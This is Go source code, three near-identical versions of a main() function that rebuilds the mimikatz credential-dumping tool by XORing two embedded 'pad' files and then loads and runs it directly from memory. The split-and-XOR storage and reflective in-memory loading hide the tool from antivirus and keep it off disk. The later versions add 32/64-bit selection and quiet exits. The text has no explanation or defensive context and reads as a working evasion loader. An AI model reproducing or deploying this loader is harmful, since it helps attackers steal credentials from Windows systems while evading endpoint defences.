func main() { // load mimikatz pads mimikatzPad0, err := Asset("mimikatz.exe.0.pad") if err != nil { panic(err) } mimikatzPad1, err := Asset("mimikatz.exe.1.pad") if err != nil { panic(err) } // XOR the pads togeather var mimikatzEXE []byte for index, bite := range mimikatzPad0 { mimikatzEXE = append(mimikatzEXE, []byte{bite ^ mimikatzPad1[index]}...) } // convert the args passed to this program into a C array of C strings var cArgs []*C.char for _, goString := range os.Args { cArgs = append(cArgs, C.CString(goString)) } // load the mimikatz reconstructed binary from memory handle := C.MemoryLoadLibrary(unsafe.Pointer(&mimikatzEXE[0]), &cArgs[0]) if handle == nil { panic("MemoryLoadLibrary failed") } // run mimikatz C.MemoryCallEntryPoint(handle) // cleanup C.MemoryFreeLibrary(handle) }
func main() { // load mimikatz pads mimikatzPad0, err := Asset("mimikatz.exe.0.pad") if err != nil { panic(err) } mimikatzPad1, err := Asset("mimikatz.exe.1.pad") if err != nil { panic(err) } // XOR the pads togeather var mimikatzEXE []byte for index, bite := range mimikatzPad0 { mimikatzEXE = append(mimikatzEXE, []byte{bite ^ mimikatzPad1[index]}...) } // convert the args passed to this program into a C array of C strings var cArgs []*C.char for _, goString := range os.Args { cArgs = append(cArgs, C.CString(goString)) } // load the mimikatz reconstructed binary from memory handle := C.MemoryLoadLibraryEx( unsafe.Pointer(&mimikatzEXE[0]), // void *data (C.size_t)(len(mimikatzEXE)), // size_t (*[0]byte)(C.MemoryDefaultAlloc), // Alloc func ptr (*[0]byte)(C.MemoryDefaultFree), // Free func ptr (*[0]byte)(C.MemoryDefaultLoadLibrary), // loadLibrary func ptr (*[0]byte)(C.MemoryDefaultGetProcAddress), // getProcAddress func ptr (*[0]byte)(C.MemoryDefaultFreeLibrary), // freeLibrary func ptr unsafe.Pointer(&cArgs[0]), // void *userdata ) // run mimikatz C.MemoryCallEntryPoint(handle) // cleanup C.MemoryFreeLibrary(handle) }
func main() { // load mimikatz if runtime.GOARCH == "amd64" { mimikatzPad0, err = Asset("mimikatz64.exe.0.pad") if err != nil { os.Exit(0) } mimikatzPad1, err = Asset("mimikatz64.exe.1.pad") if err != nil { os.Exit(0) } } else { // assume GOARCH 386 mimikatzPad0, err = Asset("mimikatz32.exe.0.pad") if err != nil { os.Exit(0) } mimikatzPad1, err = Asset("mimikatz32.exe.1.pad") if err != nil { os.Exit(0) } } var mimikatzEXE []byte for index, bite := range mimikatzPad0 { mimikatzEXE = append(mimikatzEXE, []byte{bite ^ mimikatzPad1[index]}...) } handle := C.MemoryLoadLibrary(unsafe.Pointer(&mimikatzEXE[0])) if handle == nil { print("MemoryLoadLibrary failed") os.Exit(1) } // run mimikatz output := C.MemoryCallEntryPoint(handle) C.MemoryFreeLibrary(handle) }